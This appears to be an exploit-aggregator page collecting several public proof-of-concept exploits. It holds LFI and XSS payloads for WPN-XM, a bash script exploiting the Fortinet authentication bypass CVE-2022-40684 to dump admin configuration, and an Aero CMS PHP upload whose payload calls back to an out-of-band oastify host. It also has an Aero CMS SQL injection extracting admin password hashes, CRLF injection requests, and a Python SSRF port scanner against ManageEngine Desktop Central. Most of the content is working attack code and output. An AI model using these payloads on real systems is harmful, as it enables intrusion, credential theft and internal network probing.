Latest exploits :: CodePwn

<pre><code># Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2022-02-13 # Vendor Homepage: http://wpn-xm.org/ # Software Link : https://github.com/WPN-XM/WPN-XM/ # Tested Version: 0.8.6 # Tested on: Windows 10 using XAMPP # Vulnerability Type: Local File Inclusion (LFI) & directory traversal (path traversal) CVSS v3: 7.5 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CWE: CWE-829, CWE-22 Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows unauthenticated directory traversal and Local File Inclusion through the parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello (without php) GET request. Proof of concept: To detect: http://localhost/tools/webinterface/index.php?page=) The parameter "page" can be modified and load a php file in the server. Example, In C:\:hello.php with this content: C:\>type hello.php <?php echo "HELLO FROM C:\\hello.php"; ?> To Get hello.php in c:\ : http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello Note: hello without ".php". And you can see the PHP message into the browser at the start. Response: HELLO FROM C:\hello.php<!DOCTYPE html> <html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>WP?-XM Server Stack for Windows - 0.8.6</title> <meta name="description" content="WP?-XM Server Stack for Windows - Webinterface."> <meta name="author" content="Jens-André Koch" /> <link rel="shortcut icon" href="favicon.ico" /> # Vulnerability Type: reflected Cross-Site Scripting (XSS) CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /tools/webinterface/index.php, in multiple parameters. Proof of concept: http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E </code></pre>

<pre><code># Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager) # Date: 13/10/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.fortinet.com/ # Version: #FortiOS from 7.2.0 to 7.2.1 #FortiOS from 7.0.0 to 7.0.6 #FortiProxy 7.2.0 #FortiProxy from 7.0.0 to 7.0.6 #FortiSwitchManager 7.2.0 #FortiSwitchManager 7.0.0 # Tested on: Kali Linux # CVE : CVE-2022-40684 # https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass # Usage: ./poc.sh <ip> <port> # Example: ./poc.sh 10.10.10.120 8443 #!/bin/bash red="\e[0;31m\033[1m" blue="\e[0;34m\033[1m" yellow="\e[0;33m\033[1m" end="\033[0m\e[0m" target=$1 port=$2 vuln () { echo -e "${yellow}[+] Dumping System Information: ${end}" timeout 10 curl -s -k -X $'GET' \ -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out if [ "$?" == "0" ];then grep "results" ./$target.out >/dev/null if [ "$?" == "0" ];then echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}" else rm -f ./$target.out echo -e "${red}Not Vulnerable ${end}" fi else echo -e "${red}Not Vulnerable ${end}" rm -f ./$target.out fi } vuln </code></pre>

<pre><code># Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/MegaTKC/AeroCMS # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 0.0.1 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example ----------------------------------------------------------------------------------------------------------------------- Param: image content uploading image ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116 Content-Length: 1156 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_title" mmmmmmmmmmmmmmmmm -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_category_id" 1 -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_user" admin -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_status" draft -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="image"; filename="at8vapghhb.php" Content-Type: text/plain <?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?> -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_tags" -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_content" mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="create_post" Publish Post -----------------------------369779619541997471051134453116-- ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com. </code></pre>

<pre><code># Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/MegaTKC/AeroCMS # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 0.0.1 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example SQL Injection ----------------------------------------------------------------------------------------------------------------------- Param: search ----------------------------------------------------------------------------------------------------------------------- Req sql ini detect ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 21 search=245692'&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 03:07:06 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3466 Connection: close Content-Type: text/html; charset=UTF-8 [...] Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1 ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 21 search=245692''&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 03:07:10 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94216 [...] ----------------------------------------------------------------------------------------------------------------------- Req exploiting sql ini get data admin ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 113 search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 05:40:05 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 101144 [...] <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a> [...] ----------------------------------------------------------------------------------------------------------------------- Other URL and params ----------------------------------------------------------------------------------------------------------------------- /AeroCMS-master/admin/posts.php [post_title] /AeroCMS-master/admin/posts.php [filename] /AeroCMS-master/admin/profile.php [filename] /AeroCMS-master/author_posts.php [author] /AeroCMS-master/category.php [category] /AeroCMS-master/post.php [p_id] /AeroCMS-master/search.php [search] /AeroCMS-master/admin/categories.php [cat_title] /AeroCMS-master/admin/categories.php [phpwcmsBELang cookie] /AeroCMS-master/admin/posts.php [post_content] /AeroCMS-master/admin/posts.php [p_id] /AeroCMS-master/admin/posts.php [post_category_id] /AeroCMS-master/admin/posts.php [post_title] /AeroCMS-master/admin/posts.php [reset] </code></pre>

<pre><code># Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-02-14 # Software Link : http://www.desktopcentral.com # Tested Version: 9.1.0 (Build No: 91084) # Tested on: Windows 10 # Vulnerability Type: CRLF injection (CRLF) - 1 CVSS v3: 6.1 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-93 Vulnerability description: CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in a /STATE_ID/1613157927228/InvSWMetering.csv. Proof of concept: GET https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: keep-alive Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering Upgrade-Insecure-Requests: 1 Content-Length: 0 Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 Host: localhost Response: HTTP/1.1 200 OK Date: Server: Apache Pragma: public Cache-Control: max-age=0 Expires: Wed, 31 Dec 1969 16:00:00 PST SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure Set-Cookie: buildNum=91084; Path=/ Set-Cookie: showRefMsg=false; Path=/ Set-Cookie: summarypage=false; Path=/ Set-Cookie: dc_customerid=1; Path=/ Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ Set-Cookie: screenResolution=1280x1024; Path=/ Content-Disposition: attachment; filename=any Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv X-dc-header: yes Content-Length: 95 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive Content-Type: text/csv;charset=UTF-8 # Vulnerability Type: CRLF injection (CRLF) - 2 CVSS v3: 6.1 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-93 Vulnerability description: CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf. Proof of concept: GET https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: keep-alive Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering Upgrade-Insecure-Requests: 1 Content-Length: 0 Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 Host: localhost HTTP/1.1 200 OK Date: Server: Apache Pragma: public Cache-Control: max-age=0 Expires: Wed, 31 Dec 1969 16:00:00 PST SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure Set-Cookie: buildNum=91084; Path=/ Set-Cookie: showRefMsg=false; Path=/ Set-Cookie: summarypage=false; Path=/ Set-Cookie: dc_customerid=1; Path=/ Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ Set-Cookie: screenResolution=1280x1024; Path=/ Content-Disposition: attachment; filename=any Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013 X-dc-header: yes Content-Length: 4470 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf;charset=UTF-8 # Vulnerability Type: Server-Side Request Forgery (SSRF) CVSS v3: 8.0 CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H CWE: CWE-918 Server-Side Request Forgery (SSRF) Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability in ManageEngine Desktop Central 9.1.0 allows an attacker can force a vulnerable server to trigger malicious requests to third-party servers or to internal resources. This vulnerability allows authenticated attacker with network access via HTTP and can then be leveraged to launch specific attacks such as a cross-site port attack, service enumeration, and various other attacks. Proof of concept: Save this content in a python file (ex. ssrf_manageenginedesktop9.py), change the variable sitevuln value with ip address: import argparse from termcolor import colored import requests import urllib3 import datetime urllib3.disable_warnings() print(colored(''' ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ ''',"red")) def smtpConfig_ssrf(target,port,d): now1 = datetime.datetime.now() text = '' sitevuln = 'localhost' url = 'https:// '+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin% 40manageengine.com &validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin% 40manageengine.com' cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; JSESSIONID=D10A9C62D985A0966647099E14C622F8; DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0' try: response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': ' https://192.168.56.250:8383/smtpConfig.do','Cookie': cookie,'Connection': 'keep-alive'},verify=False, timeout=10) text = response.text now2 = datetime.datetime.now() rest = (now2 - now1) seconds = rest.total_seconds() if ('updateRefMsgCookie' in text): return colored('Cookie lost',"yellow") if d == "0": print ('Time response: ' + str(rest) + '\n' + text + '\n') if (seconds > 5.0): return colored('open',"green") else: return colored('closed',"red") except: now2 = datetime.datetime.now() rest = (now2 - now1) seconds = rest.total_seconds() if (seconds > 10.0): return colored('open',"green") else: return colored('closed',"red") return colored('unknown',"yellow") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True) parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True) parser.add_argument('-d','--debug', help="ManageEngine Desktop Central 9 - SSRF Open ports (0 print or 1 no print)",required=False) args = parser.parse_args() timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug) print (args.ip + ':' + args.port + ' ' + timeresp + '\n') And: $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080 ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ 192.168.56.250:8080 open $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777 ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ 192.168.56.250:7777 closed </code></pre>